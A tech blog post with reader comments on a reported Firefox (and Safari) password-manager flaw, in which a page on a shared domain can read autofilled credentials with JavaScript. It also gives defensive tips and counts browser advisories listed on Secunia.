Firefox Password Manager Exposes Passwords - Most Secure Browser?
We’ve shown you how easy it can be to retrieve passwords stored in your browser, provided that someone has access to your computer. Well, that’s not the only way for a hacker to gain access to some of the information stored in the Firefox Password Manager. A new flaw that was just revealed late last week can retrieve some of your passwords using a very small amount of JavaScript.
How does it work? Here’s a quick example of what could happen:
- User visits a site such as their own blog hosted on a popular network (something like Blogger).
- They login, and have Firefox remember their username/password.
- They visit someone else’s blog on the same domain, and a username/password form appears on the site. As expected Firefox autofills the information for the user (both the username and password) so that they can just hit enter to login.
- The site is able to use some JavaScript to store the username and password without the user even hitting the Submit button. This is done by having the JavaScript go and retrieve the values located in the text box (
document.<form>.<field>.value).
This flaw can only be used to expose the username and password that is entered into a form, and Firefox automatically does this for people who have stored a password. That means your information could be surrendered without you even realizing it.
If you want to try this out yourself, Heise has setup a demo site where you makeup a username/password, and then have Firefox store it. Then when you go to the “evil” page, Firefox will automatically fill out the form and a popup will reveal the username and password you stored.
To get around this happening, it is recommended that you either don’t store passwords in Firefox or you disable JavaScript. Of course, this is really only an issue on a “network” of sites that all have the same domain. The reason for that is because Firefox will not, for example, fill in your bank’s username and password here on CyberNet. So just be aware of what passwords you have stored, and you can always have Firefox prompt you for a master password before it autofills any information.
An alternative that xpgeek pointed out in the forum is to install the Secure Login extension to prevent Firefox from automatically filling in password forms.
Note: This vulnerability also affects the Safari browser.
– What’s the Most Secure Browser? –
I decided to lookup on Secunia, who tracks vulnerabilities for more than 14,000 applications, to see which browser is currently the most secure. Here’s what I came up with:
- Opera 9.x has had 8 advisories, all of which have been patched. [source]
- Firefox 2.0.x has had 13 advisories, and there are 6 that have not been patched. [source]
- Internet Explorer 7.x has had 14 advisories, and there are 8 that have not been patched. [source]
You can take that information for what it’s worth, but it goes to show that most browsers constantly have security-related flaws.
Source: Heise Security [via Slashdot]
Enjoyed the post? Subscribe to our feed to get a daily dose of CyberNet!
Tags: Firefox, Freeware, Software, Browser, Internet Explorer, Opera, Safari, Vulnerabilities
Related Posts:
- Microsoft Password Checker
- Top 10 Most Common Passwords
- Don’t Store Your Messenger Passwords!
- CyberNotes: How Safe are Passwords in Internet Explorer, Firefox, and Opera?
- Huge List Of Default Passwords For Routers
I use the Secure Login extension
https://addons.mozilla.org/en-US/firefox/addon/4429
works like Opera’s wand so it doesn’t autofill the username/password.
Should also prevent the vulnerability above.
/edit
Oh, I see it’s already been mentioned. Nevermind then
It never ceases to amaze me how unwarranted Opera’s lack of popularity is. I just realized I can move around buttons everywhere in Opera. Even on the sidebar! I love the flexibility! I would need an ext or theme for these configurations in Fx, and I’d never find one just the way I want it.
I take it that you’ve been enjoying yourself with Opera then?
They should just implement the Secure Login extension into Firefox 3 since it seems to solve the problem so completely.
Thanks for the heads up. Firefox is my browser of choice so I’ll be checking out that secure login extension.
I love the tab bin. Also, I thought Opera would be really stiff with menus. It’s the opposite. I can move any button anywhere I want! In the menu-bar, sidebar, status bar, etc! Not to mention the bittorrent is far better than the 2 ext’s I tried in Fx.
There are so many useful Opera features, and I don’t have to justify each one like w/ Fx’s extensions. Most of Opera’s features have been re-created in Fx extensions, but I prefer the real thing over the artificial. The original features in Opera never slow down the browser, or reduce stability. I like real, not artificial. I use sugar not splenda and I use Opera not Fx and ext’s.
The only thorn in my shoe is Y!MB. What I do now is open it in a javascript full-screen window from Fx, so it appears as it’s own application, not Fx. The only thing is it’s innefficient since I end up running 2 browsers. I’m really pushing for that Y!MB Opera full compatibility. The reason it’s not already fully supported is because people don’t use Opera (why?).
javascript:(function(){var t=window.open(’http://mail.yahoo.com’,'Y-Mail’,'width=1016,height=734,screenX=0,screenY=0,resizable=yes’);})()
I think open source is a wonderful thing, but Firefox’s popularity is slowly making it a target. Opera is the way to go if you are worried about security in my opinion.
@netster007x: Checkout this post by Opera Watch, which is a great blog and run by an Opera employee by the way:
http://operawatch.com/news/200.....opera.html
Those are bookmarklets that you can use to open any page in another browser. The great thing with bookmarklets is that you can drag them onto any toolbar (they don’t have to be stored in your bookmarks).
I’ve already got InFF. I found it on that huge buttons list in that Opera wiki. The real problem is having to run 2 browsers simultaneously.
Make sure you checkout the Opera forum for any issues you might be having as well. They are always a good source of helpful tips…that’s how I got services like Google Docs and Google Calendar to work properly because of a script someone made there.
I haven’t looked at FF’s password manager since I discovered Roboform.